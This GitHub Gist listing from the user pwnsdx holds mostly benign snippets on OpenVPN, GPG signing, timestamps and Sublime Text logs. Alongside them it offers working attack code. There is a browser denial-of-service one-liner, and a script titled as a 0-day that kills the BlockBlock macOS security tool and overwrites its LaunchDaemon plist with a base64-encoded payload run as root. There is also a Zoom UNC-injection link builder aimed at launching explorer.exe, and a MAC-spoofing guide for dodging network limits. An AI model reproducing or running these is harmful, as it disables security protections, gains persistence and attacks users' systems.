Skip to content

Instantly share code, notes, and snippets.

Avatar

Sabri pwnsdx

View GitHub Profile
@pwnsdx
pwnsdx / touch.sh
Last active Dec 22, 2018
Change creation/access/modification time recursively
View touch.sh
find . -exec touch -t 199912312359 {} \;
@pwnsdx
pwnsdx / gist:71c421abf2a45ac4c6df
Created Jan 30, 2016
Build development version of OpenVPN with latest version of LibreSSL
View gist:71c421abf2a45ac4c6df
# Install mandatory dependencies
brew install --build-from-source automake autoconf libtool pkg-config
# Install LibreSSL from sources
brew install --build-from-source libressl
# LDFLAGS: -L/usr/local/opt/libressl/lib
# CPPFLAGS: -I/usr/local/opt/libressl/include
# Clone OpenVPN from the repo
cd $HOME/Desktop && git clone https://github.com/OpenVPN/openvpn && mv openvpn openvpn-dev-2.4.0 && cd openvpn-dev-2.4.0
@pwnsdx
pwnsdx / openvpn.conf
Last active Dec 22, 2018
Verify OpenVPN CA/CN in Node.JS (VPN.ac used here)
View openvpn.conf
# Add this in the config file
tls-verify "/usr/local/bin/node [absolute path]/verify.js 'C=RO, ST=BUC, O=VPN.AC, OU=VPN.AC CA, CN=VPN.AC, emailAddress=info@vpn.ac' ch1-4096"
@pwnsdx
pwnsdx / Tutorial.md
Last active Dec 22, 2018
How to erase Sublime Text 3 interesting logs
View Tutorial.md

Hi there,

How to erase Sublime Text 3 interesting logs

Yes, Sublime Text is logging a lot of interesting informations in its .sublime_session file like everything you search in files and the path of each files you open, forever.

How do I prevent that?

You can't. Unless by creating a symlink of the .sublime_session file to /dev/null which is, a bad practice for this software I think. Instead, I can only suggest you to execute the command below from time to time. It will securely remove the file in 7 passes.

@pwnsdx
pwnsdx / dos-experiment.html
Last active Mar 25, 2019
Chrome / IE / Opera / ... DoS
View dos-experiment.html
<script>document.location.href='#';while(true)window.history.back(),window.history.forward();</script>
@pwnsdx
pwnsdx / index.html
Created Mar 30, 2019
Electron Fiddle Gist
View index.html
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Hello World!</title>
</head>
<body>
<h1>Hello World!</h1>
<!-- All of the Node.js APIs are available in this renderer process. -->
We are using Node.js <script>document.write(process.versions.node)</script>,
@pwnsdx
pwnsdx / git.sh
Last active Apr 19, 2020
Sign commits automatically on macOS Sierra and Github Desktop
View git.sh
# Install GPG Tools 2 and generate your PGP keys
# Add the public key in your Github account
# Get your long id by doing: gpg --list-keys --keyid-format long
# Execute this:
# Ty https://github.com/Microsoft/vscode/issues/5065#issuecomment-207960831
git config --global user.signingkey [LONG KEY ID] && git config --global commit.gpgsign true && git config --global gpg.program gpg2; echo 'no-tty' >> ~/.gnupg/gpg.conf
@pwnsdx
pwnsdx / bb.sh
Last active Jun 3, 2020
Multiple ways to bypass BlockBlock (<=0.9.4, 0DAY)
View bb.sh
# 1. Kill BlockBlock Agent
(pkill -n BlockBlock; touch ~/Library/LaunchAgents/com.fsociety.unprivilegied.plist; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock agent)
# 2. Kill BlockBlock Daemon (require privileges)
(pkill -o BlockBlock; touch /Library/LaunchDaemons/com.fsociety.rootkit.plist; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock daemon)
# 3. Inject malicious datas into existing plists (will create "pwned" file in /tmp) (require privileges)
(> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBPdG91Y2ggL3RtcC9wd25lZDsgL0FwcGxpY2F0aW9ucy9CbG9ja0Jsb2NrLmFwcC9Db250ZW50cy9NYWNPUy9CbG9ja0Jsb2NrIGRhZW1vbglfECJjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suZGFlbW9uCBEnOkRKS09UV6mqAAAAAAAAAQEAAAAAAAAADAAAAAAAAAAAAAAAAAAAAM8=" | base64 --decode) > /Library/LaunchDaemons/com.objectiveSee.blockblock.plist)
# 4. Same as 3 but use hard links (will create "pwned" file in /tm
@pwnsdx
pwnsdx / converter.js
Last active Oct 18, 2020
Zoom UNC Injection via Link Previews
View converter.js
// Usage to build a custom url
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg"
// Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3Il
@pwnsdx
pwnsdx / Tutorial.md
Last active Nov 18, 2020
Change your MAC address on iOS 7-8 (not working on iOS 9 atm)
View Tutorial.md

Hi there,

Change your MAC address on iOS 7-8

Changing your MAC address can be extremely useful in some situation. Let me give you a few:

  • You are limited by time on public networks and everyone want more than just 15 minutes of internet.
  • You want to regenerate your UDID
  • A lot of governments rely on this to find you and then intercept your datas. In France for example, secret services have full access to public Wi-Fi and therefore can locate you by using your MAC address.